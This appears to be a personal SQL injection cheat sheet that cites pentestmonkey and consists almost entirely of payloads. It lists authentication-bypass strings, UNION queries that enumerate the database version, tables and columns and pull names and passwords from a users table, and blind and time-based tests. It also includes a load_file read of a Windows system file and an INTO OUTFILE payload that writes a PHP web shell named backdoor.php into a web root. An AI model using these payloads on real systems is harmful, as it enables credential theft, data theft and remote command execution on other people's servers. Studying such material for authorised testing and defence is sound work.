http://pentestmonkey.net/category/cheat-sheet/sql-injection


===========Authentication bypass ==============

' or 1=1 limit 1;#
' or 1=1;#
=======================================
id=765 order by {1}    # enumeration number of colum
id=765 union select 1,2,3,4,5,6

id=765 union select 1,2,3,4,@@version,6
id=765 union select 1,2,3,4,user(),6

id=765 union select 1,2,3,4,table_name,6 from information_schema.tables

id=765 union select 1,2,3,4,column_name,6 from information_schema.columns where table_name="users"

id=765 union select 1,2,name,4,password,6 from users

=======================================================


==========blind sql injection=======================

id=765 and 1=1;#
id=765 and 1=2;#
id=765-sleep(5)


id=765 union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
id=765 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into outfile 'c:/xampp/htdocs/backdoor.php'

====================proxy attack======================




=================================================


